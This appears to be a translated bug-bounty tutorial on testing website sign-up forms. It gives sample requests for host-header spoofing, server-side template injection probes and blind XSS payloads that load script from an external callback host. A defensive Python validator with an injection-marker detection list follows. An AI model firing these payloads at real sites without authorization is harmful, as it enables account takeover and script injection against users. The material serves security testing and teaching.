Bug Bounty Hunter Series: How to Test the Sign-up Function (III) and Related Tips
2022-10-31 09:06:44 Author: 安全狗的自我修养

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author of this article bears no legal or joint liability.

Main text

This is the third article in the series and continues the walkthrough of test procedures and methods for vulnerabilities that may exist in sign-up functionality. The earlier articles in the series are:

A Summary of Sign-up Function Testing

Bug Bounty Hunter Series: How to Test the Sign-up Function

Bug Bounty Hunter Series: How to Test the Sign-up Function and Related Tips

Method 15

Try registering with a company e-mail address, for example [email protected], and then try to access all of the company's endpoints without having verified [email protected].

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&[email protected]&password=*****&captcha=Random&token=CSRF

Method 16

If [email protected] is accepted as the e-mail address but the account cannot be activated, try spoofing the host header, for example with X-Forwarded-Host or X-Host.

 
POST /signUp HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&[email protected]&password=********&captcha=Random&token=CSRF

Method 17

Try inserting an SSTI payload into the username, such as {{7*7}}, {7*7} or ${7*7}.

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname={{7*7}}&lastname={{7*7}}&username={{7*7}}&email=me&password=*****&captcha=Random&token=CSRF

Method 18

Try inserting <% into the username. If <% turns out to have an effect in the e-mail body, try injecting <%= 7 * 7 %> to check for an SSTI vulnerability.

Method 19

Try injecting a blind XSS payload into the name fields: "><script src=//me.xss.ht></script>, and check whether there is blind XSS.

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname="><script src=//me.xss.ht></script>&lastname="><script src=//me.xss.ht></script>&[email protected]&password=**************&captcha=Random&token=CSRF

Method 20

Try injecting a blind XSS payload into the name fields: <img src="//me.xss.ht">, and check whether there is blind XSS.

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number

firstname=<img src="//me.xss.ht">&lastname=<img src="//me.xss.ht">&[email protected]&password=**************&captcha=Random&token=CSRF

Method 21

Try injecting a blind XSS payload when setting the password: "><script src=//me.xss.ht></script>

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=me&password="><script src=//me.xss.ht></script>&captcha=Random&token=CSRF
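Seen from the defending side, methods 15 to 21 above come down to three server-side controls: allowlist validation of name fields (which rejects the template and markup payloads), an activation link built from configured canonical host rather than from Host or X-Forwarded-Host, and output encoding wherever a name is rendered, with a corporate address treated as unverified until the mailed link is used. The following Python handler is an added example, not code from the original post; CANONICAL_HOST, the field names and the function names are hypothetical.

```python
import html
import re
from dataclasses import dataclass, field

# Hypothetical server config: the public host is fixed here, never read from Host/X-Forwarded-Host.
CANONICAL_HOST = "www.company.com"
CANONICAL_BASE_URL = f"https://{CANONICAL_HOST}"
# Allowlist for display-name fields: letters/digits in any script, space, dot, apostrophe, hyphen.
NAME_RE = re.compile(r"^[\w .'\-]{1,64}$")
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")
# Markers of template-expression and markup injection; used only to flag requests for logging.
INJECTION_MARKERS = ("{{", "{%", "${", "<%", "#{", "<", ">")

@dataclass
class SignupResult:
    accepted: bool
    errors: list = field(default_factory=list)
    flags: list = field(default_factory=list)   # detection signals for the SIEM, not shown to the user
    activation_url: str = ""
    email_verified: bool = False

def injection_markers_in(value: str) -> list:
    return [m for m in INJECTION_MARKERS if m in value]

def build_activation_link(token: str) -> str:
    # Built from the configured host only, so a spoofed X-Forwarded-Host cannot redirect the link.
    return f"{CANONICAL_BASE_URL}/activate?token={token}"

def process_signup(form: dict, headers: dict, token: str) -> SignupResult:
    result = SignupResult(accepted=False)
    xfh = headers.get("X-Forwarded-Host")
    if xfh and xfh != CANONICAL_HOST:
        result.flags.append(f"x-forwarded-host:{xfh}")
    for name_field in ("firstname", "lastname"):
        value = form.get(name_field, "")
        result.flags += [f"{name_field}:{m}" for m in injection_markers_in(value)]
        if not NAME_RE.match(value):
            result.errors.append(f"{name_field}: only letters, digits, space, . ' - are allowed")
    if not EMAIL_RE.match(form.get("email", "")):
        result.errors.append("email: invalid format")
    if injection_markers_in(form.get("password", "")):
        result.flags.append("password:markup")  # passwords accept any characters but are never rendered
    if result.errors:
        return result
    # Any address, corporate domain included, stays unverified until the mailed link is used.
    result.accepted, result.activation_url = True, build_activation_link(token)
    return result

def render_name(value: str) -> str:
    # Contextual output encoding for every place a name is rendered (mail body, profile page).
    return html.escape(value, quote=True)
```

The flags list is what a detection rule would key on: a sign-up carrying template markers or a foreign X-Forwarded-Host is worth an alert even when validation has already rejected it.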

References

https://rohitcoder.medium.com/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab

https://gauravnarwani.com/injecting-6200-to-1200/

https://verneet.com/fuzzing-77-till-p1/

https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

https://hackerone.com/reports/423541

https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

https://hackerone.com/reports/251224

https://twitter.com/intigriti/status/1072181482028978177

https://hackerone.com/reports/7995


github.com/hiadragon

 


Source: http://mp.weixin.qq.com/s?__biz=MzkwOTE5MDY5NA==&mid=2247485904&idx=1&sn=26f5fd7cd7ac24cdf33d7a8122855823&chksm=c13f3a99f648b38fd5d3e7610e5236dcc61516f5d2ed89145b72de069134975839b55ae15536#rd